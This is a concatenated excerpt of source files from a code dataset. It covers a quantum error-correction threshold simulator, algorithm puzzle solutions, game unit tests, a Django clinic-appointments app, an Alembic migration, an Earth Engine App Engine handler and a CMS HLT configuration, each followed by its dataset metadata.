print(\"File not found\")\n exit()\n\n\ndef get_data(data, latts, probs, P_store=1):\n\n if not latts: latts = []\n if not probs: probs = []\n fitL = data.index.get_level_values(\"L\")\n fitp = data.index.get_level_values(\"p\") if \"p\" in data.index else data.index.get_level_values(\"pg\")\n fitN = data.loc[:, \"N\"].values\n fitt = data.loc[:, \"success\"].values\n\n fitdata = [[] for i in range(4)]\n for L, P, N, t in zip(fitL, fitp, fitN, fitt):\n p = round(float(P)/P_store, 6)\n if all([N != 0, not latts or L in latts, not probs or p in probs]):\n fitdata[0].append(L)\n fitdata[1].append(p)\n fitdata[2].append(N)\n fitdata[3].append(t)\n\n return fitdata[0], fitdata[1], fitdata[2], fitdata[3]\n\n\ndef sim_thresholds(\n decoder,\n lattice_type=\"toric\",\n lattices = [],\n perror = [],\n superoperator_filenames=[],\n superoperator_filenames_additional=None,\n superoperator_filenames_additional_failed=None,\n superoperator_filenames_failed=None,\n GHZ_successes=[1.1],\n networked_architecture=False,\n space_weight=2,\n iters = 0,\n measurement_error=False,\n multithreading=False,\n threads=None,\n save_result=True,\n file_name=\"thres\",\n folder = \".\",\n P_store=1000,\n debug=False,\n cycles=None,\n **kwargs\n ):\n '''\n ############################################\n '''\n run_oopsc = oopsc.multiprocess if multithreading else oopsc.multiple\n\n if measurement_error:\n from ..graph import graph_3D as go\n else:\n from ..graph import graph_2D as go\n\n sys.setrecursionlimit(100000)\n\n get_name = lambda s: s[s.rfind(\".\")+1:]\n g_type = get_name(go.__name__)\n d_type = get_name(decoder.__name__)\n full_name = f\"{lattice_type}_{g_type}_{d_type}_{file_name}\"\n\n if not os.path.exists(folder):\n os.makedirs(folder)\n file_path = folder + \"/\" + full_name + \".csv\"\n\n progressbar = kwargs.pop(\"progressbar\")\n\n data = None\n config = oopsc.default_config(**kwargs)\n\n superoperators = []\n if superoperator_filenames:\n perror = []\n for i, superoperator_filename in enumerate(superoperator_filenames):\n for GHZ_success in GHZ_successes:\n additional = [superoperator_filenames_additional[i]] if superoperator_filenames_additional is not None \\\n else None\n additional.append(superoperator_filenames_additional_failed[i]) if \\\n superoperator_filenames_additional_failed is not None else None\n failed = superoperator_filenames_failed[i] if superoperator_filenames_failed is not None else None\n superoperator = so.Superoperator(superoperator_filename, GHZ_success,\n additional_superoperators=additional, failed_ghz_superoperator=failed)\n superoperators.append(superoperator)\n perror.append(superoperator.pg)\n data_s = {s.protocol_name: None for s in superoperators} if superoperators else None\n\n # Simulate and save results to file\n for lati in lattices:\n\n if multithreading:\n if threads is None:\n threads = mp.cpu_count()\n graph = [oopsc.lattice_type(lattice_type, config, decoder, go, lati, cycles=cycles) for _ in range(threads)]\n [g.decoder.set_space_weight(space_weight) for g in graph] if d_type == \"mwpm\" else None\n else:\n graph = oopsc.lattice_type(lattice_type, config, decoder, go, lati, cycles=cycles)\n graph.decoder.set_space_weight(space_weight) if d_type == \"mwpm\" else None\n\n for i, pi in enumerate(perror):\n\n superoperator = None\n if superoperators:\n superoperator = superoperators[i]\n superoperator.reset_stabilizer_rounds()\n networked_architecture = bool(superoperator.pn) if not networked_architecture else True\n data = data_s[superoperator.protocol_name]\n\n print(\"Calculating for L = {}{} and p = {}\".format(lati, ', GHZ_success = ' +\n str(superoperator.GHZ_success) if\n superoperator else \"\", pi))\n\n oopsc_args = dict(\n paulix=pi,\n superoperator=superoperator,\n networked_architecture=networked_architecture,\n lattice_type=lattice_type,\n debug=debug,\n processes=threads,\n progressbar=progressbar\n )\n if measurement_error and not superoperator:\n oopsc_args.update(measurex=pi)\n output = run_oopsc(lati, config, iters, graph=graph, **oopsc_args)\n\n pprint(dict(output))\n print(\"\")\n\n ind_dict = {\"L\": lattices, \"p\": perror} if not superoperator else get_superoperator_indices(lattices,\n superoperators)\n protocol_name = superoperator.protocol_name if superoperator else \"\"\n node_name = superoperator.node if superoperator else \"\"\n if data is None:\n file_path = os.path.join(folder, f\"{protocol_name if protocol_name else ''}{node_name}{full_name}.csv\")\n if os.path.exists(file_path):\n data = pd.read_csv(file_path, header=0, float_precision='round_trip')\n data = data.set_index(list(ind_dict.keys()))\n data.sort_index(inplace=True)\n else:\n columns = list(output.keys())\n index = pd.MultiIndex.from_product([*ind_dict.values()], names=ind_dict.keys())\n data = pd.DataFrame(0, index=index, columns=columns)\n\n cur_index = (lati, pi) if not superoperator else get_current_index(lati, superoperator)\n\n for key, value in output.items():\n if cur_index not in data.index:\n data.loc[cur_index, :] = 0\n data.loc[cur_index, key] = (data.loc[cur_index, key] + value if cur_index in data.index\n and not pd.isna(data.loc[cur_index, key]) else value)\n\n data.sort_index(inplace=True)\n\n if save_result:\n data = data[(data.T.applymap(lambda x: x != 0 and x is not None and not pd.isna(x))).any()]\n data.to_csv(file_path)\n data_s[superoperator.protocol_name] = data if superoperators else None\n\n print(data.to_string())\n\n if save_result:\n print(\"file saved to {}\".format(file_path))\n data.to_csv(file_path)\n","sub_path":"oopsc/threshold/sim.py","file_name":"sim.py","file_ext":"py","file_size_in_byte":8039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"155157724","text":"\"\"\"\nGiven an expression s includes numbers, letters and brackets. Number represents the number of repetitions inside the brackets(can be a string or another expression).Please expand expression to be a string.\n\nHave you met this question in a real interview? Yes\nExample\ns = abc3[a] return abcaaa\ns = 3[abc] return abcabcabc\ns = 4[ac]dy, return acacacacdy\ns = 3[2[ad]3[pf]]xyz, return adadpfpfpfadadpfpfpfadadpfpfpfxyz\n\n\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param: s: an expression includes numbers, letters and brackets\n @return: a string\n \"\"\"\n def expressionExpand(self, s):\n # write your code here\n import string\n if not s:\n return ''\n stk = []\n cnt = 0\n for i in range(len(s)):\n if s[i].isdigit():\n cnt = cnt*10 + int(s[i])\n elif s[i] == '[':\n stk.append(cnt)\n cnt = 0\n elif s[i] == ']':\n strs = []\n while stk:\n node = stk.pop()\n if type(node) == int:\n stk.append(''.join(reversed(strs))*node)\n break\n strs.append(node)\n else:\n stk.append(s[i])\n return ''.join(stk)","sub_path":"lintcode/575_expression_expand.py","file_name":"575_expression_expand.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"343034981","text":"import unittest\nfrom game_object.tank import Enemy, Player, Artillery\nfrom game_object.game_object import Missile, Bomb, Bonus\nimport settings\nfrom constant.constant import OBJ_SIZE\nfrom game.load_level import LoadLevel\n\n\nclass TestTank(unittest.TestCase):\n def setUp(self):\n self.test_load_level = LoadLevel()\n self.test_level = self.test_load_level.load_level(1.5)\n self.test_enemy = Enemy(\n enemies=[Enemy(x=150, y=15, kind=\"fast\", enemies=[], level_map=None)], x=1, y=1, kind=\"hurt\",\n level_map=self.test_level)\n self.test_enemy.enemies.append(Enemy(x=self.test_enemy.x, y=self.test_enemy.y, kind=self.test_enemy.kind,\n enemies=self.test_enemy.enemies, level_map=self.test_level))\n self.test_enemy.direction = 180\n self.test_player = Player(145, 375, enemies=self.test_enemy.enemies, count_of_enemies=2,\n bonus_on_level=[Bonus(145, 375, \"LIFE\")], level_map=self.test_level)\n test_bomb = Bomb(100, 100)\n self.test_player.bomb.append(test_bomb)\n self.test_player.level_map.append(test_bomb)\n self.test_artillery = Artillery(300, 300, level_map=self.test_level)\n\n def test_type(self):\n self.assertEqual(self.test_enemy.speed, 2)\n\n def test_move_enemy(self):\n self.test_enemy.make_move(self.test_player)\n self.test_enemy.update_position(settings.GAME_DISPLAY)\n self.assertEqual(self.test_enemy.y, 2.0)\n\n def test_shoot(self):\n self.test_enemy.shoot(self.test_enemy.direction)\n self.assertTrue(len(self.test_enemy.missile) == 1 and self.test_enemy.missile[0].direction_y == 1)\n\n def test_collision_with_enemy(self):\n self.assertTrue(self.test_player.with_enemy_collision((2, 1)))\n\n def test_collision_with_other_tank(self):\n self.assertTrue(self.test_enemy.with_other_tank_collision((150, 1), self.test_player))\n\n def test_player_shoot(self):\n self.test_player.missile.append(Missile(151, 16, 1, 1, 1, OBJ_SIZE))\n self.test_player.collision_missile_with_enemy()\n self.assertTrue(len(self.test_player.kill_enemy) == 1)\n\n def test_bomb_del(self):\n for bomb in self.test_player.bomb:\n bomb.tick_life += 200\n self.test_player.del_bomb(bomb)\n self.assertTrue(self.test_player.bomb == [])\n\n def test_bomb_kill_enemy(self):\n test_kill_bomb = Bomb(1, 1)\n self.test_player.bomb.append(test_kill_bomb)\n self.test_player.level_map.append(test_kill_bomb)\n self.test_player.enemy_collision_with_bomb()\n self.assertTrue(len(self.test_player.kill_enemy) == 1)\n\n def test_collision_with_bonus(self):\n self.test_player.collision_with_bonus()\n self.assertTrue(self.test_player.hp == 200)\n\n def test_artillery_shoot(self):\n self.test_artillery.count_for_shoot = 150\n self.test_artillery.make_boom(self.test_player, self.test_enemy.enemies)\n self.assertTrue(self.test_player.hp < 0)\n\n def test_artillery_rotate(self):\n self.test_artillery.artillery_rotate(self.test_player)\n self.assertTrue(self.test_artillery.angle == 90)\n","sub_path":"tests/test_tank.py","file_name":"test_tank.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"652804570","text":"\"\"\"Add admin to user table\n\nRevision ID: 25c113963024\nRevises: a1e203fa291c\nCreate Date: 2016-05-10 15:38:32.362699\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '25c113963024'\ndown_revision = 'a1e203fa291c'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n op.add_column('user',\n sa.Column('is_admin', sa.Boolean, default=0))\n\ndef downgrade():\n op.drop_column('user', 'is_admin')\n","sub_path":"alembic/versions/25c113963024_add_admin_to_user_table.py","file_name":"25c113963024_add_admin_to_user_table.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"306170535","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib import messages\nfrom .forms import CitaForm, PacienteForm, MedicoForm\nfrom .models import Medico, Paciente, Cita\nfrom django.contrib.auth.decorators import login_required\n\n#Cita\n\ndef ListaCita(request):\n citas = Cita.objects.all\n return render(request, 'cita/ListaCita.html', {'citas':citas})\n\ndef DetalleCita(request, pk):\n citas = get_object_or_404(Cita, pk=pk)\n return render(request, 'cita/DetalleCita.html', {'citas':citas})\n\n@login_required\ndef NuevaCita(request):\n if request.method == \"POST\":\n formulario = CitaForm(request.POST)\n if formulario.is_valid():\n cita = formulario.save(commit=False)\n for medico_id in request.POST.getlist('medico'):\n for paciente_id in request.POST.getlist('paciente'):\n cita = Cita(medico_id=medico_id,\n paciente_id=paciente_id,\n fecha=formulario.cleaned_data['fecha'],\n hora=formulario.cleaned_data['hora'],\n observaciones=formulario.cleaned_data['observaciones'])\n cita.save()\n messages.add_message(request, messages.SUCCESS, 'Datos guardados')\n return redirect('ListaCita')\n else:\n formulario = CitaForm()\n return render(request, 'cita/EditarCita.html', {'formulario':formulario})\n\n@login_required\ndef EditarCita(request, pk):\n cita = get_object_or_404(Cita, pk=pk)\n if request.method == \"POST\":\n formulario = CitaForm(request.POST, instance=cita)\n if formulario.is_valid():\n cita = formulario.save(commit=False)\n for medico_id in request.POST.getlist('medico'):\n for paciente_id in request.POST.getlist('paciente'):\n cita.save()\n messages.add_message(request, messages.SUCCESS, 'Datos guardados')\n return redirect('ListaCita')\n else:\n formulario = CitaForm(instance=cita)\n return render(request, 'cita/EditarCita.html', {'formulario':formulario})\n\n@login_required\ndef EliminarCita(request, pk):\n cita = get_object_or_404(Cita, pk=pk)\n cita.delete()\n return redirect('ListaCita')\n\n#Paciente\n\ndef ListaPaciente(request):\n pacientes = Paciente.objects.all\n return render(request, 'cita/ListaPaciente.html', {'pacientes':pacientes})\n\ndef DetallePaciente(request, pk):\n pacientes = get_object_or_404(Paciente, pk=pk)\n return render(request, 'cita/DetallePaciente.html', {'pacientes':pacientes})\n\n@login_required\ndef NuevoPaciente(request):\n if request.method == \"POST\":\n formulario = PacienteForm(request.POST)\n if formulario.is_valid():\n paciente = formulario.save(commit=False)\n paciente = Paciente(nombre=formulario.cleaned_data['nombre'],\n apellido=formulario.cleaned_data['apellido'],\n edad=formulario.cleaned_data['edad'],\n sexo=formulario.cleaned_data['sexo'])\n paciente.save()\n messages.add_message(request, messages.SUCCESS, 'Datos guardados')\n return redirect('ListaPaciente')\n else:\n formulario = PacienteForm()\n return render(request, 'cita/EditarPaciente.html', {'formulario':formulario})\n\n@login_required\ndef EditarPaciente(request, pk):\n paciente = get_object_or_404(Paciente, pk=pk)\n if request.method == \"POST\":\n formulario = PacienteForm(request.POST, instance=paciente)\n if formulario.is_valid():\n paciente = formulario.save(commit=False)\n paciente.save()\n messages.add_message(request, messages.SUCCESS, 'Datos guardados')\n return redirect('ListaPaciente')\n else:\n formulario = PacienteForm(instance=paciente)\n return render(request, 'cita/EditarPaciente.html', {'formulario':formulario})\n\n@login_required\ndef EliminarPaciente(request, pk):\n paciente = get_object_or_404(Paciente, pk=pk)\n paciente.delete()\n return redirect('ListaPaciente')\n\n#Medico\n\ndef ListaMedico(request):\n medicos = Medico.objects.all\n return render(request, 'cita/ListaMedico.html', {'medicos':medicos})\n\ndef DetalleMedico(request, pk):\n medicos = get_object_or_404(Medico, pk=pk)\n return render(request, 'cita/DetalleMedico.html', {'medicos':medicos})\n\n@login_required\ndef NuevoMedico(request):\n if request.method == \"POST\":\n formulario = MedicoForm(request.POST)\n if formulario.is_valid():\n medico = formulario.save(commit=False)\n medico = Medico(nombre=formulario.cleaned_data['nombre'],\n apellido=formulario.cleaned_data['apellido'],\n especialidad=formulario.cleaned_data['especialidad'],\n telefono=formulario.cleaned_data['telefono'],\n fecha_nacimiento=formulario.cleaned_data['fecha_nacimiento'])\n medico.save()\n messages.add_message(request, messages.SUCCESS, 'Datos guardados')\n return redirect('ListaMedico')\n else:\n formulario = MedicoForm()\n return render(request, 'cita/EditarMedico.html', {'formulario':formulario})\n@login_required\ndef EditarMedico(request, pk):\n medico = get_object_or_404(Medico, pk=pk)\n if request.method == \"POST\":\n formulario = MedicoForm(request.POST, instance=medico)\n if formulario.is_valid():\n medico = formulario.save(commit=False)\n medico.save()\n messages.add_message(request, messages.SUCCESS, 'Datos guardados')\n return redirect('ListaMedico')\n else:\n formulario = MedicoForm(instance=medico)\n return render(request, 'cita/EditarMedico.html', {'formulario':formulario})\n\n@login_required\ndef EliminarMedico(request, pk):\n medico = get_object_or_404(Medico, pk=pk)\n medico.delete()\n return redirect('ListaMedico')\n","sub_path":"citas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"270709575","text":"import time\nimport unittest\n\nfrom request_demo_helper import Application\n\n\nclass DealerScience(unittest.TestCase):\n def setUp(self):\n self.app = Application()\n\n def test_dealer(self):\n self.app.go_to_homepage()\n self.app.click_request_demo()\n self.app.enter_name(\"Tester\")\n self.app.enter_phone(\"1234567890\")\n self.app.enter_email(\"tester@fake.com\")\n self.app.enter_dealership(\"Honda Waltham\")\n self.app.enter_message(\"testing request\")\n self.app.click_submit()\n time.sleep(10)\n self.assertEqual(\"Thank you for contacting us! We will get back to you shortly. Have a great day!\",\n self.app.close_alert_and_get_its_text())\n\n def tearDown(self):\n self.app.destroy()\n\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"test_request_demo.py","file_name":"test_request_demo.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"100411702","text":"unlock_objects = {\r\n \"input_folder_name\": \"Object_Methods\",\r\n \"input_file_name\": \"UnlockObjects\",\r\n \"output_package_name\": \"object\",\r\n \"output_module_name\": \"unlock_objects\",\r\n\r\n \"doc_html\": \"\"\"\r\n Unlocks one or more objects. Locked object are visible, and they can be snapped to. But, they cannot be selected.\r\n \"\"\",\r\n\r\n \"syntax_html\": {\r\n 0: (\"arrObjects\"),\r\n },\r\n\r\n \"params_html\": {\r\n 0: {\r\n \"name\": \"arrObjects\",\r\n \"py_name\": \"objects\",\r\n \"opt_or_req\": \"Required\",\r\n \"type\": \"Array\",\r\n \"name_prefix\": \"arr_of_str\",\r\n \"name_main\": \"Objects\",\r\n \"doc\": \"\"\"\r\n An array of strings identifying the objects to unlock.\r\n \"\"\"\r\n },\r\n },\r\n\r\n \"returns_html\": {\r\n 0: {\r\n \"type\": \"number\",\r\n \"doc\": \"The number of objects unlocked if successful.\"\r\n },\r\n 1: {\r\n \"type\": \"null\",\r\n \"doc\": \"If not successful, or on error.\"\r\n },\r\n },\r\n\r\n \"id_com\": 306,\r\n\r\n \"params_com\": {\r\n 0: {\r\n \"name\": \"vaObjects\",\r\n \"opt_or_req\": \"Required\",\r\n \"type\": \"tagVARIANT\",\r\n },\r\n },\r\n\r\n \"returns_com\": \"tagVARIANT\",\r\n\r\n}\r\n\r\n","sub_path":"py2rhino-project/branches/sandbox2/py2rhino/_make/data/parser_out/object/unlock_objects.py","file_name":"unlock_objects.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"458152611","text":"#!/usr/bin/env python\n\"\"\"A simple example of connecting to Earth Engine using App Engine.\"\"\"\n\n\n\n# Works in the local development environment and when deployed.\n# If successful, shows a single web page with the SRTM DEM\n# displayed in a Google Map. See accompanying README file for\n# instructions on how to set up authentication.\n\nimport os\nimport json\nimport config\nimport sys\n\ndef fix_path():\n sys.path.append(os.path.join(os.path.dirname(__file__), 'lib'))\n\nfix_path()\nimport ee\nimport jinja2\nimport webapp2\nfrom google.appengine.api import memcache\n\njinja_environment = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))\n\nEE_CREDENTIALS = ee.ServiceAccountCredentials(config.EE_ACCOUNT, config.EE_PRIVATE_KEY_FILE)\nclass MainPage(webapp2.RequestHandler):\n def get(self): # pylint: disable=g-bad-name\n \"\"\"Request an image from Earth Engine and render it to a web page.\"\"\"\n \n ee.Initialize(EE_CREDENTIALS)\n region = ee.Geometry.Polygon([[-64.51171875, -5.090944175033373], [-58.359375, -7.18810087117902],[-58.18359375, -2.1088986592431254]]);\n\n def area_analisis(region):\n IMAGE_COLLECTION_ID = 'WHRC/biomass/tropical'\n image =ee.Image(IMAGE_COLLECTION_ID)\n #image = images.mosaic()\n #mapid = image.getMapId({'min': 0, 'max': 1000})\n reduce_args = {\n 'reducer': ee.Reducer.sum(),\n 'geometry': region,\n 'bestEffort': True,\n 'scale': 3000,\n 'maxPixels': 10000000,\n 'tileScale': 1\n }\n multi = (10000*255)\n area_stats = image.float().divide(multi).multiply(ee.Image.pixelArea()).reduceRegion(**reduce_args)\n return area_stats.getInfo()\n #return images\n # These could be put directly into template.render, but it\n # helps make the script more readable to pull them out here, especially\n # if this is expanded to include more variables.\n template_values = {\n 'area': area_analisis(region)['b1']\n }\n template = jinja_environment.get_template('index.html')\n self.response.out.write(template.render(template_values))\n\napp = webapp2.WSGIApplication([('/', MainPage)], debug=True)\n","sub_path":"ee_appengine.py","file_name":"ee_appengine.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"238860475","text":"class Solution:\n # @param matrix, a list of lists of integers\n # @param target, an integer\n # @return a boolean\n def searchMatrix(self, matrix, target):\n n = len(matrix)\n if n == 0:\n return False\n m = len(matrix[0])\n if m == 0:\n return False\n l = 0\n r = n * m - 1\n while l <= r:\n mid = (l + r) >> 1\n x = mid / m\n y = mid % m\n if matrix[x][y] == target:\n return True\n if matrix[x][y] < target:\n l = mid + 1\n else:\n r = mid - 1\n return False\n","sub_path":"LeetCode/search-a-2d-matrix.py","file_name":"search-a-2d-matrix.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"215444524","text":"# /users/rredjimi/Onia_1e33/3e33at441/V9 (CMSSW_4_2_0_HLT33)\n\nimport FWCore.ParameterSet.Config as cms\n\n\nHLTConfigVersion = cms.PSet(\n tableName = cms.string('/users/rredjimi/Onia_1e33/3e33at441/V9')\n)\n\nhltESSL3AbsoluteCorrectionService = cms.ESSource( \"LXXXCorrectionService\",\n appendToDataLabel = cms.string( \"\" ),\n level = cms.string( \"L3Absolute\" ),\n algorithm = cms.string( \"AK5Calo\" ),\n section = cms.string( \"\" ),\n era = cms.string( \"\" ),\n useCondDB = cms.untracked.bool( True )\n)\nhltESSL2RelativeCorrectionService = cms.ESSource( \"LXXXCorrectionService\",\n appendToDataLabel = cms.string( \"\" ),\n level = cms.string( \"L2Relative\" ),\n algorithm = cms.string( \"AK5Calo\" ),\n section = cms.string( \"\" ),\n era = cms.string( \"\" ),\n useCondDB = cms.untracked.bool( True )\n)\nhltESSL1FastJetCorrectionService = cms.ESSource( \"L1FastjetCorrectionService\",\n era = cms.string( \"Jec10V1\" ),\n level = cms.string( \"L1FastJet\" ),\n algorithm = cms.string( \"AK5Calo\" ),\n section = cms.string( \"\" ),\n srcRho = cms.InputTag( 'hltKT6CaloJets','rho' ),\n useCondDB = cms.untracked.bool( True )\n)\nhltESSHcalSeverityLevel = cms.ESSource( \"EmptyESSource\",\n recordName = cms.string( \"HcalSeverityLevelComputerRcd\" ),\n iovIsRunNotTime = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n firstValid = cms.vuint32( 1 )\n)\nhltESSEcalSeverityLevel = cms.ESSource( \"EmptyESSource\",\n recordName = cms.string( \"EcalSeverityLevelAlgoRcd\" ),\n iovIsRunNotTime = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n firstValid = cms.vuint32( 1 )\n)\nhltESSBTagRecord = cms.ESSource( \"EmptyESSource\",\n recordName = cms.string( \"JetTagComputerRecord\" ),\n iovIsRunNotTime = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n firstValid = cms.vuint32( 1 )\n)\nhltESSAK5CaloL2L3 = cms.ESSource( \"JetCorrectionServiceChain\",\n appendToDataLabel = cms.string( \"\" ),\n correctors = cms.vstring( 'hltESSL2RelativeCorrectionService',\n 'hltESSL3AbsoluteCorrectionService' ),\n label = cms.string( \"hltESSAK5CaloL2L3\" )\n)\nhltESSAK5CaloL1L2L3 = cms.ESSource( \"JetCorrectionServiceChain\",\n appendToDataLabel = cms.string( \"\" ),\n correctors = cms.vstring( 'hltESSL1FastJetCorrectionService',\n 'hltESSL2RelativeCorrectionService',\n 'hltESSL3AbsoluteCorrectionService' ),\n label = cms.string( \"hltESSAK5CaloL1L2L3\" )\n)\n\nsiPixelTemplateDBObjectESProducer = cms.ESProducer( \"SiPixelTemplateDBObjectESProducer\",\n appendToDataLabel = cms.string( \"\" )\n)\npreshowerDetIdAssociator = cms.ESProducer( \"DetIdAssociatorESProducer\",\n ComponentName = cms.string( \"PreshowerDetIdAssociator\" ),\n appendToDataLabel = cms.string( \"\" ),\n etaBinSize = cms.double( 0.1 ),\n nEta = cms.int32( 60 ),\n nPhi = cms.int32( 30 ),\n includeBadChambers = cms.bool( False )\n)\nnavigationSchoolESProducer = cms.ESProducer( \"NavigationSchoolESProducer\",\n ComponentName = cms.string( \"SimpleNavigationSchool\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nmuonDetIdAssociator = cms.ESProducer( \"DetIdAssociatorESProducer\",\n ComponentName = cms.string( \"MuonDetIdAssociator\" ),\n appendToDataLabel = cms.string( \"\" ),\n etaBinSize = cms.double( 0.125 ),\n nEta = cms.int32( 48 ),\n nPhi = cms.int32( 48 ),\n includeBadChambers = cms.bool( False )\n)\nhoDetIdAssociator = cms.ESProducer( \"DetIdAssociatorESProducer\",\n ComponentName = cms.string( \"HODetIdAssociator\" ),\n appendToDataLabel = cms.string( \"\" ),\n etaBinSize = cms.double( 0.087 ),\n nEta = cms.int32( 30 ),\n nPhi = cms.int32( 72 ),\n includeBadChambers = cms.bool( False )\n)\nhltESPbJetRegionalTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPbJetRegionalTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 5 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 8 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 1.0 )\n )\n)\nhltESPbJetRegionalTrajectoryBuilder = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPbJetRegionalTrajectoryBuilder\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPbJetRegionalTrajectoryFilter\" ),\n maxCand = cms.int32( 1 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTrajectorySmootherRK = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"hltESPTrajectorySmootherRK\" ),\n Propagator = cms.string( \"hltESPRungeKuttaTrackerPropagator\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTrajectoryFitterRK = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"hltESPTrajectoryFitterRK\" ),\n Propagator = cms.string( \"hltESPRungeKuttaTrackerPropagator\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTrajectoryFilterL3 = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPTrajectoryFilterL3\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 5 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 1000000000 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.5 )\n )\n)\nhltESPTrajectoryCleanerBySharedHits = cms.ESProducer( \"TrajectoryCleanerESProducer\",\n ComponentName = cms.string( \"hltESPTrajectoryCleanerBySharedHits\" ),\n ComponentType = cms.string( \"TrajectoryCleanerBySharedHits\" ),\n appendToDataLabel = cms.string( \"\" ),\n fractionShared = cms.double( 0.5 ),\n allowSharedFirstHit = cms.bool( False )\n)\nhltESPTrajectoryBuilderL3 = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPTrajectoryBuilderL3\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPTrajectoryFilterL3\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTrackCounting3D2nd = cms.ESProducer( \"TrackCountingESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n nthTrack = cms.int32( 2 ),\n impactParameterType = cms.int32( 0 ),\n deltaR = cms.double( -1.0 ),\n maximumDecayLength = cms.double( 5.0 ),\n maximumDistanceToJetAxis = cms.double( 0.07 ),\n trackQualityClass = cms.string( \"any\" )\n)\nhltESPTrackCounting3D1st = cms.ESProducer( \"TrackCountingESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n nthTrack = cms.int32( 1 ),\n impactParameterType = cms.int32( 0 ),\n deltaR = cms.double( -1.0 ),\n maximumDecayLength = cms.double( 5.0 ),\n maximumDistanceToJetAxis = cms.double( 0.07 ),\n trackQualityClass = cms.string( \"any\" )\n)\nhltESPTTRHBuilderPixelOnly = cms.ESProducer( \"TkTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( 